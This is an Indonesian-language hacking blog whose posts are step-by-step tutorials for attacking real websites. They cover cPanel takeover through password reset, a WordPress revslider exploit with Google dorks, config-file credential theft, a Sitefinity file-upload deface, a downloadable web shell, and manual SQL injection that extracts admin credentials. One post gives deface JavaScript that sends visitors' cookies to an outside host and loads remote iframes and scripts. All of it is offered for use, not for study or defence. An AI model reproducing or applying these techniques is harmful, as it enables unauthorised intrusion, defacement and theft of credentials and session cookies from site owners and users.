Hacker Patah Hati

Breaking

Senin, 23 Juli 2018

Juli 23, 2018

Cara Crak Cpanel Lewat Reset Passwd cpanel

Cara Crak Cpanel Lewat Reset Passwd Cpanel

Assalamualaikum
Hello akmj Kali Ini W akan Share cara Cara Crak Cpanel Lewat Reset Passwd cpanel
Oke Langsung saja


Bahan Bahan Yng Di butuhkan
-Akses Shell
-koneksi internet :v

Langsung Saja Ke Tutorial Na mhank :v

Pertama masuk ke akses shell mu masuk ke folder user
Kedua masuk ke dir .cpanel terus hapus file contacinfo

Ke tiga Masuk Ke dir user lagi terus edit contacemail ganti email di situ pakai email kamu

Ke empat Masuk ke site.com:2083/resetpass?start=1 terus masukan nama user nya selanjut na isi kolom email pakai email yang kamu ganti tadi tunggu beberapa menit terus cek di spam email masukan kode kemanan nya ke kolom cpanel kalau udah tinggal ganti passwd cpanel :D

0
By at Tidak ada komentar:

Kamis, 24 Mei 2018

Mei 24, 2018

deface wordpress dengan revslider

Tutorial Deface Wordpress Dengan Teknik Revslider









Assalamualaikum


Kali ini gua bakal share deface teknik revslider, tapi ntah masih work apa engga :v yang penting share aja ya ga? :v
Soalnya mimin dah lama ga deface :"(
OK , langsung ja

Pertama kita download dulu bahan bahan yang udah ada
• ActivePerl => Disini <=
• Perl eXploit => Disini <=
• CMD
• Target pastinya
• Dork : inurl: 
/wp-content/plugins/revslider < bisa dikembangin
intitle:"Index Of/ revslider" < bisa dikembangin
intitle:"Index Of/wp-content/plugins/revslider" < bisa dikembangin
intitle:"Index Of/admin/revslider" < bisa dikembangin
intitle:"Index Of/fr/revslider" < bisa dikembangin
intitle:"Index Of/en/revslider" < bisa dikembangin
intitle:"Index Of/us/revslider" < bisa dikembangin


Sebelum mulai pastikan ActivePerlnya udah di instal
Kalo udah di install activeperlnya , extract exploitnya di C:/Perl/bin
Kalo udah ente install buka file revslider.zip , ganti script cmd.php menjadi script shell kalian
Kalo udah baru MULAI

Pertama buka dulu CMDnya , caranya klik Windows + R terus tulis CMD lalu klik ok/ya


Kalo udah bakal muncul cmdmu

Terus ketik cd c:\Perl\bin < tempat install ActivePerlnya
Terus enter bosq

Kalo udah ketik exploitnya
Ketik " perl redsm0ke.pl http://target.com revslider " Lalu enter. Tanpa tanda kutip ketiknya ya
Target nya bisa cari sendiri y

Kalo status shellnya :
[-] Shell : 200 OKE
Berarti sukses di upload bos

Kalo udah muncul kek gitu , kita buka shellnya

Cara akses shellnya

Shell access : http://www.target.com/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php
5
By at 5 komentar:

Selasa, 22 Mei 2018

Mei 22, 2018

deface dengan tenik jumping


DEFACE TENIK JUMPING





Assalamualaikum.


Kali ini gua bakal share tutorial deface tenik jumping
yaudah gausah banyak bacot lagi :v




Pergi ke jumping, anda liat apakah ada jumpingan nya seperti gambar diatas, jika tidak ada yaudah deritalo ajg :v


Lalu klik config untuk mengambil confignya




 Jika sudah pergi ke public html, pilih folder config
 (nama config tergantung lu pake shell apa yang penting belakang nya ada tulisan config)




Jika sudah masuk ke config, lalu klik auto edit user, copas id pw nya lalu klik hajar!!
Lu bisa kok ganti u/p nya sesuka hatimu, aku mah apa atuh gabisa maksa kamuh :"(




Jika sukses maka tampilan nya akan seperti gambar di atas,  tinggal klik aja link site nya lalu pake u/p yang tadi anda copas




Sekian dan terimakasih
Semoga bermanfaat :)





1
By at 1 komentar:

Senin, 21 Mei 2018

Mei 21, 2018

hacker patah hati shell v1

Hacker Patah Hati Shell V.1

Assalamualaikum



Kali ini gua bakal post tentang shell hacker patah hati
Apa itu shell? googling aja babik males w ngetik panjang :v
Langsung aja gausah banyak bacot :v

Apa saja filtur di dalamnya ?



Link Download : https://pastebin.com/wJ4tpjwJ
Password : hphshell


Sekian, Trimakasih 




1
By at 1 komentar:

Minggu, 20 Mei 2018

Mei 20, 2018

Tutorial deface teknik site finity android

Tutorial deface di android dengan metode site finity
Yoo mamang kali ini gua  akan memberikan tutorial cara deface di android dengan metode site finity,
sebelumnya kalian udah tau kan apa itu deface?? kalo gatau mate j y lo hhh
kalau udah tau langsung saja simak tutorialnya:D
perhatian!!! kalian harus punya script deface nya dulu kalau tidak gimana mau deface nya??



1.buka browser kalian apa saja terserah lalu ke google

2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search

3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut 
(sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh 
http://sitetarget.org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian

5.klik yang di bawah nya tunggu sampai loading selesai

6.tambah link target tadi dengan (/files) contoh http://sitetarget.org/files/namascriptdefacekalian.html lalu klik search
7.Selese :v




SELAMAT MENCOBA BOSKU
0
By at Tidak ada komentar:
Mei 20, 2018
Tutor buat script JSO

Asalamualaikum wr wb.
Kali ini w bagi tips cara buat script JSO

Copy kode di bawah ini

/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/"> */ document.getElementsByTagName('body')[0].innerHTML="" document.title="Pwnd Gasai47" var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://66.media.tumblr.com/ae95f10220dc9965b718b6966606d6cf/tumblr_n1yxvxZNgo1t014gho1_500.gif";document.getElementsByTagName("head")[0].appendChild(shortc) function muter2(){ scrW=screen.availWidth scrH=screen.availHeight window.moveTo(0,0) window.resizeTo(10,10) window.focus() for(x=0;x<80;x++){ window.resizeTo(10,scrH*x/80) } for(y=0;y<80;y++){ window.resizeTo(scrW*y/80,scrH) } window.resizeTo(scrW,scrH) } document.oncontextmenu=new Function("muter2();return false"); function keypressed(){alert("You Lose , Zuhahahaha");} document.onkeydown=keypressed; function kasih_tau(){ alert('You Lose , Zuhahahaha'); } if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('Yoshioka in Your Heart');",3000); else setTimeout("kasih_tau()",3000); if(navigator.userAgent.indexOf('MSIE')!=-1){ document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://www.helvaciemlak.com/files/nge.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>"; } else{ if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){ //muter2(); log=""; if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";} document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log window.onload=function(){ document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://www.helvaciemlak.com/files/nge.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>"; document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;"; } } }

Note:
Yg aku kasih warna itu ganti dengan link deface lu/bekas deface ,mu

Setelah di copy, Buka situs pastebin Di sini , terus copy kan kode di atas tadi bos

setelah itu tinggal salin link nya aja, setelah lu salin link tinggal ganti aja link yg diwarnain tadi dengan link mu :(


<script type="text/javascript" src="http://pastebin.com/raw/V3gywPcq"></script>


Sekian makasih :v
1
By at 1 komentar:

Sabtu, 19 Mei 2018

Mei 19, 2018

Deface SQL Injection [ Manual ]

Halo bosq Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Tutorial Deface SQL Injection [ Manual ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

SQL Injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya. SQL Injection digunakan untuk berkomunikasi dengan database website


Deface SQL Injection [ Manual ]

1. Menemukan SQL injection situs rentan 

Dorking :
              - inurl:? index.php id =
              - inurl:? admin.php id =
              - inurl:? pages.php id =
              - inurl:? pages.php id =


copy dan paste salah satu script di Google seperti inurl:? id = index.php


2. Pilih salah Satu Web

Contoh => www.target.com/index.php?id=1



3. Sekarang Anda harus menambahkan ( ') pada akhir URL 


contoh => www.target.com/index.php?id=1'

jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.


4.  Sekarang kita harus mencari jumlah kolom


www.target.com/index.php?id=1 order by 10-- (ERROR)

www.target.com/index.php?id=1 order by 9-- (ERROR)

www.target.com/index.php?id=1 order by 8-- (ERROR)

www.target.com/index.php?id=1 order by 7-- (NO ERROR)


jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7


5. Sekarang kita harus menemukan kolom rentan 


serikat www.target.com/index.php?id=1pilih 1,2,3,4,5,6,7--

jika menunjukkan angka 2 kolom maka rentan adalah 2



6.  kita harus menemukan versi database 


www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--

Mengganti kolom rentan dengan "@@ version"

jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya



7.  Sekarang menemukan nama database


serikat www.target.com/index.php?id=1pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--



ia akan menampilkan nama data base biarkan nama data base adalah "dunia"



8. Sekarang menemukan nama semua tabel 


union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -


ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel

biarkan kita menemukan nama tabel "administrator"



9. Sekarang kita harus mencari nama kolom


union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang () 

kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password

biarkan kita memiliki nama dua kolom user_name dan pass_word.



10.  Sekarang menemukan password dari user_name 


www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator


itu akan menampilkan username dan password Kita
Sekian
0
By at Tidak ada komentar: